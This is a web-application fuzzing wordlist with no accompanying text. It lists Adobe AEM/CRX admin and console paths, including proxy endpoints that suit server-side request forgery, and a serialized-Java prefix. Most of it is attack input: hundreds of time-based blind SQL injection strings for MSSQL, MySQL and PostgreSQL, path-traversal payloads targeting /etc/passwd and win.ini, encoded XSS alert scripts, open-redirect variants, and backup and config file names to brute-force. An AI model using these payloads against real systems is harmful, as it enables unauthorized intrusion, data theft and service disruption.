Inconnu0lb.1.json
ReaderExtensions
admin
adminui
and 0=benchmark(3000000,MD5(1)) #
and 0=benchmark(3000000,MD5(1)) --
and 0=benchmark(3000000,MD5(1)) /*
apps / test
bin / crxde / logs
bin / crxde / logs {0}? tail = 100
bin / msm / audit
bin / wcm / contentfinder / connector / suggestions
content / geometrixx
content / test
content / usergenerated /
content / usergenerated / etc / commerce / smartlists
content / usergenerated / etc / commerce / smartlists / test
crx
crx / de
crx / packageshare
crx / repository / test
damadmin
damadmin # / content / dam
etc
etc / packages
lc / cm /
lc / content / ws
lc / system / console
libs / cq / cloudservicesprovisioning / content / autoprovisioning
libs / cq / security / userinfo
libs / dam / cloud / proxy
libs / granite / security / currentuser
libs / mcm / salesforce / customer {0}? checkType = authorize & authorization_url = {{0}} & customer_key = zzzz & customer_secret = zzzz & redirect_uri = xxxx & code = e
libs / mcm / salesforce / customer {0}? customer_key = x & customer_secret = y & refresh_token = z & instance_url = {{0}}% 23
libs / opensocial / makeRequest {0}? url = {{0}}
libs / opensocial / proxy {0}? container = default & url = {{0}}
miscadmin
miscadmin # / etc / blueprints
miscadmin # / etc / designs
miscadmin # / etc / importers
miscadmin # / etc / mobile
miscadmin # / etc / msm / rolloutconfigs
miscadmin # / etc / segmentation
mobileformsivs
projects
rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cH //// c =
siteadmin
system / admin
system / console
system / console / bundles
system / console / configMgr
system / console / diskbenchmark
system / console / licenses
system / console / memoryusage
system / console / mimetypes
system / console / productinfo
system / console / profiler
system / console / vmstat
system / sling / loginstatus
tagging
waitfor delay '0:0:__TIME__' --
waitfor delay '0:0:__TIME__' /*
welcome
workspace
!
!.gitignore
!.htaccess
!.htpasswd
!=
!BACKUP
!BACKUPS
!Backup
!Backups
!CREDITS.TXT
!INSTALL.TXT
!LICENSE.TXT
!ReadMe.txt
!_archives
!_images
!access_setup
!access_setup.%EXT%
!admin!
!backup
!backups
!images
!mssql_setup
!mssql_setup.%EXT%
!mssql_setup.asp
!mysql_setup
!mysql_setup.%EXT%
!mysql_setup.asp
!old
!res
!setup
!setup.%EXT%
!textove_diskuse
!upload
!ut
" and 0=benchmark(3000000,MD5(1)) #
" and 0=benchmark(3000000,MD5(1)) --
" and 0=benchmark(3000000,MD5(1)) /*
" or benchmark(10000000,MD5(1))#
" or pg_sleep(__TIME__)--
" or sleep(__TIME__)#
" or sleep(__TIME__)="
" waitfor delay '0:0:__TIME__' --
" waitfor delay '0:0:__TIME__' /*
") and 0=benchmark(3000000,MD5(1)) #
") and 0=benchmark(3000000,MD5(1)) --
") and 0=benchmark(3000000,MD5(1)) /*
") or benchmark(10000000,MD5(1))#
") or pg_sleep(__TIME__)--
") or sleep(__TIME__)="
") waitfor delay '0:0:__TIME__' --
") waitfor delay '0:0:__TIME__' /*
") waitfor delay '0:0:__TIME__' /*
")) and 0=benchmark(3000000,MD5(1)) #
")) and 0=benchmark(3000000,MD5(1)) --
")) and 0=benchmark(3000000,MD5(1)) /*
")) or benchmark(10000000,MD5(1))#
")) or pg_sleep(__TIME__)--
")) or sleep(__TIME__)="
")) waitfor delay '0:0:__TIME__' --
")) waitfor delay '0:0:__TIME__' /*
")) waitfor delay '0:0:__TIME__' /*
"))) and 0=benchmark(3000000,MD5(1)) #
"))) and 0=benchmark(3000000,MD5(1)) --
"))) and 0=benchmark(3000000,MD5(1)) /*
"))) waitfor delay '0:0:__TIME__' --
"))) waitfor delay '0:0:__TIME__' /*
")))) and 0=benchmark(3000000,MD5(1)) #
")))) and 0=benchmark(3000000,MD5(1)) --
")))) and 0=benchmark(3000000,MD5(1)) /*
")))) waitfor delay '0:0:__TIME__' --
")))) waitfor delay '0:0:__TIME__' /*
"))))) waitfor delay '0:0:__TIME__' --
"))))) waitfor delay '0:0:__TIME__' /*
")))))) waitfor delay '0:0:__TIME__' --
")))))) waitfor delay '0:0:__TIME__' /*
"));waitfor delay '0:0:__TIME__'--
"),(select if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))#
"),(select if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
"),(select if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
"),NULL) waitfor delay '0:0:__TIME__' --
"),NULL) waitfor delay '0:0:__TIME__' /*
"),NULL,NULL) waitfor delay '0:0:__TIME__' --
"),NULL,NULL) waitfor delay '0:0:__TIME__' /*
"),NULL,NULL,NULL) waitfor delay '0:0:__TIME__' --
"),NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /*
"),NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' --
"),NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /*
"),NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' --
"),NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /*
"),NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' --
"),NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /*
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' --
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /*
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' --
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /*
"); if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:__TIME__' --
"); if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:__TIME__'
"); if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:__TIME__' --
"); if not(select system_user) <> 'sa' waitfor delay '0:0:__TIME__' --
"); if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:__TIME__' --
"); if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:__TIME__' --
"); if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:__TIME__' --
"); if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:__TIME__' --
");waitfor delay '0:0:__TIME__'--
",(select if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))#
",(select if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
",(select if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
",NULL) waitfor delay '0:0:__TIME__' --
",NULL) waitfor delay '0:0:__TIME__' /*
",NULL,NULL) waitfor delay '0:0:__TIME__' --
",NULL,NULL) waitfor delay '0:0:__TIME__' /*
",NULL,NULL,NULL) waitfor delay '0:0:__TIME__' --
",NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /*
",NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' --
",NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /*
",NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' --
",NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /*
",NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' --
",NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /*
",NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' --
",NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /*
",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' --
",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /*
";
"; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:__TIME__' --
"; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:__TIME__'
"; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:__TIME__' --
"; if not(select system_user) <> 'sa' waitfor delay '0:0:__TIME__' --
"; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:__TIME__' --
"; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:__TIME__' --
"; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:__TIME__' --
"; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:__TIME__' --
";waitfor delay '0:0:__TIME__'--
">.pl
"the
#
# Look at the result codes in the headers - 403 likely mean the dir exists, 404 means not. It takes an ISAPI filter for IIS to return 404's for 403s.
# directory-list-1.0.txt
# directory-list-2.3-big.txt
# directory-list-2.3-medium.txt
# directory-list-2.3-small.txt
# directory-list-lowercase-2.3-big.txt
# directory-list-lowercase-2.3-medium.txt
# directory-list-lowercase-2.3-small.txt
# fuzz inside cgi directories - on windows, this is usually /scripts /bin /cgi or /cgi-bin, on unix, usually /cgi-bin /cgi or /nph-cgi
#.htaccess#
#/.
#/admin
#/admin/dashboard
#/backup
#/cluster
#/conf
#/configuration
#/frameworks
#/login
#/pipelineruns
#?
#HTTPClntRecv
#admin/system/api
#bea_wls_internal/HTTPClntRecv
#bea_wls_internal/HTTPClntRecv/*
#bea_wls_internal/iiop/ClientRecv
#bea_wls_internal/iiop/ClientRecv/*
$SysReset/AppxLogs/RestoreDownlevelAllUserStore.log
$SysReset/Logs/SessionID.xml
$SysReset/Logs/Timestamp.xml
$SysReset/Logs/diagerr.xml
$SysReset/Logs/diagwrn.xml
$SysReset/Logs/setupact.log
$SysReset/Logs/setuperr.log
$SysReset/ResetSession.xml
$defaultnav
$metadata
$recycle.bin/s-1-5-18/desktop.ini
$sn-va-web-client-app.do
${idfwbonavigation}.xml
%
%%-13^%%-135052920^header.tpl.php
%%-14^%%-1407541581^method.tpl.php
%%-19^%%-1910644431^basicindex.tpl.php
%%-20^%%-2040098360^filesource.tpl.php
%%-65^%%-658603405^page.tpl.php
%%0E^0E4^0E407559%%footer.tpl.php
%%117^%%1172603085^index.tpl.php
%%127^%%12781687^pkgelementindex.tpl.php
%%131^%%131447552^elementindex.tpl.php
%%13^13E^13E2CA0E%%home.tpl.php
%%146^%%146134639^function.tpl.php
%%165^%%1653142046^class.tpl.php
%%176^%%1767056382^include.tpl.php
%%202^%%2027336986^classtrees.tpl.php
%%239^%%239105369^footer.tpl.php
%%2A^2A7^2A72D64A%%categories.tpl.php
%%2E^2E4^2E4D4797%%add_user.tpl.php
%%33^330^33066966%%manage_users.tpl.php
%%3D^3D3^3D34000E%%message.tpl.php
%%41^41F^41F24718%%header.tpl.php
%%45^45E^45E480CD%%index.tpl.php
%%5F^5F2^5F2CEFE2%%myaccount.tpl.php
%%6A^6A5^6A537DD8%%login.tpl.php
%%6D^6D7^6D7C5625%%test.tpl.php
%%708^%%708843835^var.tpl.php
%%72^72A^72AAA3F9%%settings.tpl.php
%%B7^B7E^B7EEE2AD%%users.tpl.php
%%C8^C82^C821C881%%register.tpl.php
%%E3^E36^E36F7EB7%%test.conf%7Csetup.php
%%F2^F2A^F2A0FFFB%%sermons.tpl.php
%%F7^F7F^F7F34188%%header.tpl.php
%%FC^FC8^FC84D2B5%%login.tpl.php
%-
%.
%.1
%.2
%.3
%.bac
%.backup
%.bak
%.cache
%.conf
%.cs
%.csproj
%.dif
%.dist
%.err
%.gz
%.inc
%.ini
%.java
%.log
%.lst
%.map
%.old
%.orig
%.part
%.rej
%.sass-cache
%.sav
%.save
%.save.1
%.sublime-project
%.sublime-workspace
%.swp
%.tar
%.tar.gz
%.temp
%.templ
%.tgz
%.tmp
%.txt
%.un~
%.vb
%.vbproj
%.vi
%.zip
%0
%00
%00../../../../../../etc/passwd
%00.cfm
%00/
%00/etc/passwd%00
%00/yoursite.com
%07/yoursite.com
%09
%09%3b
%09..
%09/yoursite.com
%09;
%0A
%0D
%0D/yoursite.com
%0D/yoursite.com (Also try %09, %00, %0a, %07)
%0a%0a.jsp
%0a/yoursite.com
%0d
%0dadmin
%0dadministrator
%0ddashboard
%0ddebug
%0dpanel
%0dreg
%0dregister
%0dusers
%1
%2
%20
%20#
%20%23
%20..
%20../
%20admin%20
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%23
%23%3f
%2500.cfm
%252e%252e%252f/
%252e%252e%253b/
%252e%252f/
%252e%253b/
%252e/
%252f
%252f%252f
%252f/
%26
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%2F/yoururl.com
%2e%2e
%2e%2e%2f/
%2e%2e%3b/
%2e%2e/
%2e%2e///proc/self/root/etc/passwd
%2e%2e//google.com
%2e%2e//google.comgoogle.com
%2e%2e;/test
%2e%2e;test
%2e%2e;test/
%2e%2f/
%2e%3b/
%2e%3b//
%2e/
%2e//
%2e/admin
%2f
%2f%20%23
%2f%23
%2f%2f
%2f%2f%2f
%2f%3b%2f
%2f%3b%2f%2f
%2f%3f
%2f%3f/
%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boot.ini
%2f/
%2f/%2f
%2f//
%2f;?
%2f?;
%3b
%3b%09
%3b%2f%2e%2e
%3b%2f%2e%2e%2f%2e%2e%2f%2f
%3b%2f%2e.
%3b%2f..
%3b/
%3b/%2e%2e/..%2f%2f
%3b/%2e.
%3b/%2f%2f../
%3b/..
%3b//%2f../
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
%3f
%3f%23
%3f%3f
%3f.jsp
%3f.php
%3f/
%5Cyoururl.com
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
%5c/
%61
%61dmin
%62%61%73%65/%70%6f%73%74%2e%70%68%70
%69%73%70%69%72%69%74/%69%6d/%75%70%6c%6f%61%64%2e%70%68%70
%73%65%65%79%6f%6e/%68%74%6d%6c%6f%66%66%69%63%65%73%65%72%76%6c%65%74
%75%73%65%72%2e%70%68%70
%7c~.aspx
%C0%AE%C0%AE%C0%AF
%EXT%
%EXT%.7z
%EXT%.backup
%EXT%.bak
%EXT%.cgi
%EXT%.conf
%EXT%.copy
%EXT%.gz
%EXT%.htaccess
%EXT%.js
%EXT%.json
%EXT%.log
%EXT%.old
%EXT%.original
%EXT%.php
%EXT%.py
%EXT%.rar
%EXT%.rb
%EXT%.sql
%EXT%.swp
%EXT%.tar
%EXT%.tgz
%EXT%.tmp
%EXT%.txt
%EXT%.xml
%EXT%.zip
%NETHOOD%/
%_
%a%s%p%d
%appdata%/microsoft/objframe.dll
%appdata%/microsoft/shmgr.dll
%c0
%c0%ae%c0%ae%c0%af
%e5%bc%80%e5%a5%96%e5%99%a8/config.js
%e5%bc%80%e5%a5%96%e5%99%a8/kaijiang/config.js
%e5%bc%80%e5%a5%96%e5%99%a8/kj/config.js
%e5%bc%80%e5%a5%96%e5%99%a8/nxkj2015/config.js
%e5%bc%80%e5%a5%96%e6%96%87%e4%bb%b6/config.js
%e5%bc%80%e5%a5%96%e7%a8%8b%e5%ba%8f/config.js
%e9%87%87%e9%9b%86/config.js
%ff
%ff/
%s
%system%/FFExtendedCommand.dll
%system%/cdgext32.dll
%system%/cfgbkmgrs.dll
%system%/cfgmgr64.dll
%system%/comsvrpcs.dll
%system%/d3dx8_20.dll
%system%/dllcomm.dll
%system%/gpktcsp32.dll
%system%/mdwmnsp.dll
%system%/objframe.dll
%system%/rpcdist.dll
%system%/scsvrft.dll
%system%/sdptbw.dll
%system%/shlink32.dll
%system%/shlink64.dll
%system%/skypeie6plugin.dll
%system%/slbkbw.dll
%system%/wmspdmgr.dll
%~
%~1
%~bk
&
&&
&tid=generator
&ano=
&autor=
&chat=
&classificacao=
&displayer=
&genero=
<script>alert('Vulnerable');</script>
&maxeps=
&outros=
&parte=
&player=
&source
&tid=generator
'
' and 0=benchmark(3000000,MD5(1)) #
' and 0=benchmark(3000000,MD5(1)) --
' and 0=benchmark(3000000,MD5(1)) /*
' or benchmark(10000000,MD5(1))#
' or pg_sleep(__TIME__)--
' or sleep(__TIME__)#
' or sleep(__TIME__)='
' waitfor delay '0:0:__TIME__' --
' waitfor delay '0:0:__TIME__' /*
') and 0=benchmark(3000000,MD5(1)) #
') and 0=benchmark(3000000,MD5(1)) --
') and 0=benchmark(3000000,MD5(1)) /*
') or benchmark(10000000,MD5(1))#
') or pg_sleep(__TIME__)--
') or sleep(__TIME__)='
') waitfor delay '0:0:__TIME__' --
') waitfor delay '0:0:__TIME__' /*
') waitfor delay '0:0:__TIME__' /*
')) and 0=benchmark(3000000,MD5(1)) #
')) and 0=benchmark(3000000,MD5(1)) --
')) and 0=benchmark(3000000,MD5(1)) /*
')) or benchmark(10000000,MD5(1))#
')) or pg_sleep(__TIME__)--
')) or sleep(__TIME__)='
')) waitfor delay '0:0:__TIME__' --
')) waitfor delay '0:0:__TIME__' /*
')) waitfor delay '0:0:__TIME__' /*
'))) and 0=benchmark(3000000,MD5(1)) #
'))) and 0=benchmark(3000000,MD5(1)) --
'))) and 0=benchmark(3000000,MD5(1)) /*
'))) waitfor delay '0:0:__TIME__' --
'))) waitfor delay '0:0:__TIME__' /*
')))) and 0=benchmark(3000000,MD5(1)) #
')))) and 0=benchmark(3000000,MD5(1)) --
')))) and 0=benchmark(3000000,MD5(1)) /*
')))) waitfor delay '0:0:__TIME__' --
')))) waitfor delay '0:0:__TIME__' /*
'))))) waitfor delay '0:0:__TIME__' --
'))))) waitfor delay '0:0:__TIME__' /*
')))))) waitfor delay '0:0:__TIME__' --
')))))) waitfor delay '0:0:__TIME__' /*
'));waitfor delay '0:0:__TIME__'--
'),(select if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))#
'),(select if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
'),(select if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
'),NULL) waifor delay '0:0:__TIME__' /*
'),NULL) waitfor delay '0:0:__TIME__' --
'),NULL,NULL) waitfor delay '0:0:__TIME__' --
'),NULL,NULL) waitfor delay '0:0:__TIME__' /*
'),NULL,NULL,NULL) waitfor delay '0:0:__TIME__' --
'),NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /*
'),NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' --
'),NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /*
'),NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' --
'),NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /*
'),NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' --
'),NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /*
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' --
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /*
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' --
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /*
'); if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:__TIME__' --
'); if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:__TIME__'
'); if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:__TIME__' --
'); if not(select system_user) <> 'sa' waitfor delay '0:0:__TIME__' --
'); if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:__TIME__' --
'); if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:__TIME__' --
'); if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:__TIME__' --
'); if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:__TIME__' --
');waitfor delay '0:0:__TIME__'--
',(select if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))#
',(select if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
',(select if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
',NULL) waifor delay '0:0:__TIME__' /*
',NULL) waitfor delay '0:0:__TIME__' --
',NULL,NULL) waitfor delay '0:0:__TIME__' --
',NULL,NULL) waitfor delay '0:0:__TIME__' /*
',NULL,NULL,NULL) waitfor delay '0:0:__TIME__' --
',NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /*
',NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' --
',NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /*
',NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' --
',NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /*
',NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' --
',NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /*
',NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' --
',NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /*
',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' --
',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /*
'-alert(document.domain)-'
'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:__TIME__' --
'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:__TIME__'
'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:__TIME__' --
'; if not(select system_user) <> 'sa' waitfor delay '0:0:__TIME__' --
'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:__TIME__' --
'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:__TIME__' --
'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:__TIME__' --
'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:__TIME__' --
';alert(document.domain)//
';waitfor delay '0:0:__TIME__'--
'wp-admin
(compaq)
(dtcc)
(pty)
({files:.*}).tar.gz
)
) and 0=benchmark(3000000,MD5(1)) #
) and 0=benchmark(3000000,MD5(1)) --
) and 0=benchmark(3000000,MD5(1)) /*
) waitfor delay '0:0:__TIME__' --
) waitfor delay '0:0:__TIME__' /*
) waitfor delay '0:0:__TIME__' /*
)) and 0=benchmark(3000000,MD5(1)) #
)) and 0=benchmark(3000000,MD5(1)) --
)) and 0=benchmark(3000000,MD5(1)) /*
)) waitfor delay '0:0:__TIME__' --
)) waitfor delay '0:0:__TIME__' /*
)) waitfor delay '0:0:__TIME__' /*
))) and 0=benchmark(3000000,MD5(1)) #
))) and 0=benchmark(3000000,MD5(1)) --
))) and 0=benchmark(3000000,MD5(1)) /*
))) waitfor delay '0:0:__TIME__' --
))) waitfor delay '0:0:__TIME__' /*
)))) and 0=benchmark(3000000,MD5(1)) #
)))) and 0=benchmark(3000000,MD5(1)) --
)))) and 0=benchmark(3000000,MD5(1)) /*
)))) waitfor delay '0:0:__TIME__' --
)))) waitfor delay '0:0:__TIME__' /*
))))) waitfor delay '0:0:__TIME__' --
)))))) waitfor delay '0:0:__TIME__' --
));waitfor delay '0:0:__TIME__'--
),(select if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))#
),(select if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
),(select if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
),NULL) waitfor delay '0:0:__TIME__' --
),NULL) waitfor delay '0:0:__TIME__' /*
),NULL,NULL) waitfor delay '0:0:__TIME__' --
),NULL,NULL) waitfor delay '0:0:__TIME__' /*
),NULL,NULL,NULL) waitfor delay '0:0:__TIME__' --
),NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /*
),NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' --
),NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /*
),NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' --
),NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /*
),NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' --
),NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /*
),NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' --
),NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /*
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' --
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL) waitfor delay '0:0:__TIME__' /*
);waitfor delay '0:0:__TIME__'--
*
*&
*&
*&*
*&__hsfp*
*&__hssc*
*&__hstc*
*&__utma*
*&__utmb*
*&__utmc*
*&__utmk*
*&__utmv*
*&__utmx*
*&__utmz*
*&_bc_fsnf=1*
*&_cldee*
*&_eboga*
*&_ga*
*&_hsenc*
*&_hsmi*
*&access*
*&action*
*&action=
*&affid*
*&affiliate*
*&afftrack*
*&afu*
*&*
*&ref*
*&utm-content*
*&utm-term*
*&utm_term*
*&back=
*&bxajaxid=
*&calendar*
*&cart_uuid*
*&cat*
*&categories*
*&cfid*
*&cftoken*
*&city*
*&client_token*
*&cloc*
*&cr*
*&crt*
*&crumb*
*&ct*
*&date*
*&db_oem_id*
*&discount*
*&do*
*&ebtv*
*&err*
*&event_types*
*&eventpassword*
*&fb_action_ids*
*&fb_action_types*
*&filter_description=
*&filter_name=
*&filter_sub_category=
*&format*
*&gclid*
*&gonnado_ads*
*&height*
*&hsctatracking*
*&i*
*&id*
*&id=*
*&id_currency=
*&internal_ref*
*&invite*
*&is_miles*
*&is_paid*
*&itemid*
*&jvi*
*&kw*
*&l=0*
*&lat*
*&lid*
*&limit=
*&lng*
*&loc*
*&location*
*&mc_cid*
*&mc_eid*
*&mkt_tok*
*&mode*
*&n=
*&name*
*&nocache*
*&nomo*
*&nopas*
*&o*
*&oid*
*&option*
*&order=
*&orderby=
*&orderid*
*&orderway=
*&p=
*&page_id*
*&paged_section*
*&past*
*&platform*
*&price*
*&print=
*&q*
*&quicktabs_*
*&r*
*&radius*
*&rank*
*&ref*
*&referrer*
*®*
*&s*
*&s=
*&search_query=
*&selecteddate*
*&sessionguid*
*&show_onboarding*
*&showprivate*
*&sid*
*&sig*
*&slat*
*&slng*
*&sort*
*&sort=
*&source*
*&spellcheck*
*&spid*
*&spot*
*&spsid*
*&src*
*&srnk*
*&start*
*&subcat*
*&tag=
*&team_reg_type*
*&team_token*
*&ter*
*&tid*
*&tracking=
*&tracking_code*
*&type=98*
*&url*
*&user_type*
*&user_type_sig*
*&utm-content*
*&utm-source*
*&utm-term*
*&utm_compaign*
*&utm_content*
*&utm_media*
*&utm_term*
*&view*
*&viwe*
*&vp_ne_lat*
*&vp_ne_lng*
*&vp_sw_lat*
*&vp_sw_lng*
*&w*
*&websyncid*
*&width*
*&wmode*
*&x*
*&pm*
*&print=
*&st*
***
*-popup$
*-print.html$
*.*
*..gitignore.html
*._amp.author.html
*._amp.figcaption.html
*._amp.fonts.html
*._amp.footer.html
*._amp.html
*._amp.linkedarticles.html
*._amp.relatedthemes.html
*._amp.style.html
*._amp.text.html
*._amp.tracking.html
*._instantarticles.author.html
*._instantarticles.development.author.html
*._instantarticles.development.footer.html
*._instantarticles.development.html
*._instantarticles.development.linkedarticles.html
*._instantarticles.development.media.html
*._instantarticles.development.relatedthemes.html
*._instantarticles.footer.html
*._instantarticles.html
*._instantarticles.linkedarticles.html
*._instantarticles.media.html
*._instantarticles.relatedthemes.html
*._responsive.ad-include.html
*._responsive.add_articletag.html
*._responsive.adshop.html
*._responsive.appetizer.html
*._responsive.appetizer.json.html
*._responsive.appetizer_list.ajax.html
*._responsive.appetizer_list.header.html
*._responsive.appetizer_list.html
*._responsive.appetizer_list.json.html
*._responsive.appetizer_list.load_more.html
*._responsive.appetizer_list.pagenav.html
*._responsive.article_ec.html
*._responsive.breaking_news.html
*._responsive.brickconfig.html
*._responsive.common.html
*._responsive.common.iframe.html
*._responsive.common.static.html
*._responsive.common.urlinclude.html
*._responsive.config-data.google.html
*._responsive.config-data.html
*._responsive.config-data.ivw.html
*._responsive.config-data.oms.html
*._responsive.config.html
*._responsive.contactform.html
*._responsive.contactform.submit.html
*._responsive.custom.html
*._responsive.detail..gitignore.html
*._responsive.detail.article_media.html
*._responsive.detail.article_video.html
*._responsive.detail.comments.html
*._responsive.detail.footer.html
*._responsive.detail.form.html
*._responsive.detail.gallery.html
*._responsive.detail.gallery_button.html
*._responsive.detail.header.html
*._responsive.detail.homepage_button.html
*._responsive.detail.html
*._responsive.detail.image.html
*._responsive.detail.linked_gallery.html
*._responsive.detail.linked_multipage.html
*._responsive.detail.rating.html
*._responsive.detail.related_themes.html
*._responsive.detail.result.html
*._responsive.detail.socialbar.html
*._responsive.detail.text.html
*._responsive.detail.video.html
*._responsive.dynamic.html
*._responsive.dynamic.submenu.html
*._responsive.feeds.html
*._responsive.feeds.widget.html
*._responsive.html
*._responsive.image.appetizer.html
*._responsive.image.detail.html
*._responsive.image.html
*._responsive.image.thumb.html
*._responsive.liveticker.html
*._responsive.liveticker.tag.html
*._responsive.maintenance.html
*._responsive.navigation.dropdown.html
*._responsive.navigation.html
*._responsive.openxext.html
*._responsive.plista.html
*._responsive.plista.init.html
